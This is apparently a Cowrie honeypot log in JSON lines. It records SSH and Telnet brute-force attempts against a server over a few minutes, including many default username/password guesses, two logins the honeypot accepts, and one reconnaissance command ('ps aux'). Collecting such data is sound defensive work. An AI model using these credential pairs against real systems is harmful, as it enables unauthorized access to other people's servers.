{"eventid":"cowrie.login.failed","username":"centos","password":"qwerty","message":"login attempt [centos/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T14:02:56.191901Z","src_ip":"212.227.125.160","session":"7470ca498a3a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:02:57.357408Z","src_ip":"212.227.125.160","session":"7470ca498a3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52188,"dst_ip":"1.2.3.4","dst_port":22,"session":"257bccacd354","protocol":"ssh","message":"New connection: 212.227.125.160:52188 (1.2.3.4:22) [session: 257bccacd354]","sensor":"my-vps","timestamp":"2025-08-28T14:03:31.919515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:03:31.920769Z","src_ip":"212.227.125.160","session":"257bccacd354"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:03:32.089807Z","src_ip":"212.227.125.160","session":"257bccacd354"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123123","message":"login attempt [centos/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:03:32.967044Z","src_ip":"212.227.125.160","session":"257bccacd354"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:03:34.169545Z","src_ip":"212.227.125.160","session":"257bccacd354"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:03:53.841554Z","src_ip":"212.227.125.160","session":"216c03be4bbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40696,"dst_ip":"1.2.3.4","dst_port":22,"session":"c50c5ad43267","protocol":"ssh","message":"New connection: 212.227.125.160:40696 (1.2.3.4:22) [session: c50c5ad43267]","sensor":"my-vps","timestamp":"2025-08-28T14:04:07.919907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:04:08.062506Z","src_ip":"212.227.125.160","session":"c50c5ad43267"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:04:08.130414Z","src_ip":"212.227.125.160","session":"c50c5ad43267"}
{"eventid":"cowrie.login.failed","username":"centos","password":"111111","message":"login attempt [centos/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T14:04:08.815314Z","src_ip":"212.227.125.160","session":"c50c5ad43267"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:04:09.999001Z","src_ip":"212.227.125.160","session":"c50c5ad43267"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47684,"dst_ip":"1.2.3.4","dst_port":22,"session":"f20d3dad36a4","protocol":"ssh","message":"New connection: 212.227.125.160:47684 (1.2.3.4:22) [session: f20d3dad36a4]","sensor":"my-vps","timestamp":"2025-08-28T14:04:43.336479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:04:43.340179Z","src_ip":"212.227.125.160","session":"f20d3dad36a4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:04:43.500436Z","src_ip":"212.227.125.160","session":"f20d3dad36a4"}
{"eventid":"cowrie.login.failed","username":"centos","password":"1234567","message":"login attempt [centos/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T14:04:44.151154Z","src_ip":"212.227.125.160","session":"f20d3dad36a4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:04:45.316133Z","src_ip":"212.227.125.160","session":"f20d3dad36a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":23734,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1b3f3892121","protocol":"ssh","message":"New connection: 212.227.235.229:23734 (1.2.3.4:22) [session: d1b3f3892121]","sensor":"my-vps","timestamp":"2025-08-28T14:05:04.899538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:05:05.125813Z","src_ip":"212.227.235.229","session":"d1b3f3892121"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:05:05.386575Z","src_ip":"212.227.235.229","session":"d1b3f3892121"}
{"eventid":"cowrie.login.success","username":"root","password":"100713","message":"login attempt [root/100713] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:05:06.752221Z","src_ip":"212.227.235.229","session":"d1b3f3892121"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:05:07.675150Z","src_ip":"212.227.235.229","session":"d1b3f3892121"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-28T14:05:07.675823Z","src_ip":"212.227.235.229","session":"d1b3f3892121"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:05:08.045503Z","src_ip":"212.227.235.229","session":"d1b3f3892121"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:05:08.100688Z","src_ip":"212.227.235.229","session":"d1b3f3892121"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41778,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb8444d9ecea","protocol":"ssh","message":"New connection: 212.227.125.160:41778 (1.2.3.4:22) [session: fb8444d9ecea]","sensor":"my-vps","timestamp":"2025-08-28T14:05:19.199869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:05:19.200887Z","src_ip":"212.227.125.160","session":"fb8444d9ecea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:05:19.368052Z","src_ip":"212.227.125.160","session":"fb8444d9ecea"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456","message":"login attempt [debian/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T14:05:20.023618Z","src_ip":"212.227.125.160","session":"fb8444d9ecea"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:05:21.193079Z","src_ip":"212.227.125.160","session":"fb8444d9ecea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50966,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2d75b15b1a5","protocol":"ssh","message":"New connection: 212.227.125.160:50966 (1.2.3.4:22) [session: d2d75b15b1a5]","sensor":"my-vps","timestamp":"2025-08-28T14:05:53.234144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:05:53.241503Z","src_ip":"212.227.125.160","session":"d2d75b15b1a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:05:53.404475Z","src_ip":"212.227.125.160","session":"d2d75b15b1a5"}
{"eventid":"cowrie.login.failed","username":"debian","password":"password","message":"login attempt [debian/password] failed","sensor":"my-vps","timestamp":"2025-08-28T14:05:54.083134Z","src_ip":"212.227.125.160","session":"d2d75b15b1a5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:05:55.295136Z","src_ip":"212.227.125.160","session":"d2d75b15b1a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44772,"dst_ip":"1.2.3.4","dst_port":23,"session":"b8d0c27e178a","protocol":"telnet","message":"New connection: 212.227.235.229:44772 (1.2.3.4:23) [session: b8d0c27e178a]","sensor":"my-vps","timestamp":"2025-08-28T14:05:57.262138Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":56278,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecfe002c94ca","protocol":"ssh","message":"New connection: 77.90.185.47:56278 (1.2.3.4:22) [session: ecfe002c94ca]","sensor":"my-vps","timestamp":"2025-08-28T14:05:57.853550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:05:58.151162Z","src_ip":"77.90.185.47","session":"ecfe002c94ca"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T14:05:58.151971Z","src_ip":"77.90.185.47","session":"ecfe002c94ca"}
{"eventid":"cowrie.login.success","username":"root","password":"opnsense","message":"login attempt [root/opnsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:05:59.272376Z","src_ip":"77.90.185.47","session":"ecfe002c94ca"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51004,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e27f1779464","protocol":"ssh","message":"New connection: 217.72.205.35:51004 (1.2.3.4:22) [session: 7e27f1779464]","sensor":"my-vps","timestamp":"2025-08-28T14:05:59.575939Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:05:59.577523Z","src_ip":"217.72.205.35","session":"7e27f1779464"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:05:59.583269Z","src_ip":"77.90.185.47","session":"ecfe002c94ca"}
{"eventid":"cowrie.session.closed","duration":30.834482669830322,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:06:28.096535Z","src_ip":"212.227.235.229","session":"b8d0c27e178a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55482,"dst_ip":"1.2.3.4","dst_port":22,"session":"61e724fd751c","protocol":"ssh","message":"New connection: 212.227.125.160:55482 (1.2.3.4:22) [session: 61e724fd751c]","sensor":"my-vps","timestamp":"2025-08-28T14:06:29.816237Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:06:29.817992Z","src_ip":"212.227.125.160","session":"61e724fd751c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:06:29.985487Z","src_ip":"212.227.125.160","session":"61e724fd751c"}
{"eventid":"cowrie.login.failed","username":"debian","password":"123456789","message":"login attempt [debian/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T14:06:30.662337Z","src_ip":"212.227.125.160","session":"61e724fd751c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:06:31.833689Z","src_ip":"212.227.125.160","session":"61e724fd751c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44176,"dst_ip":"1.2.3.4","dst_port":22,"session":"c26909348ee8","protocol":"ssh","message":"New connection: 212.227.125.160:44176 (1.2.3.4:22) [session: c26909348ee8]","sensor":"my-vps","timestamp":"2025-08-28T14:07:05.893278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:07:05.895068Z","src_ip":"212.227.125.160","session":"c26909348ee8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:07:06.065904Z","src_ip":"212.227.125.160","session":"c26909348ee8"}
{"eventid":"cowrie.login.failed","username":"debian","password":"12345","message":"login attempt [debian/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:07:06.756772Z","src_ip":"212.227.125.160","session":"c26909348ee8"}
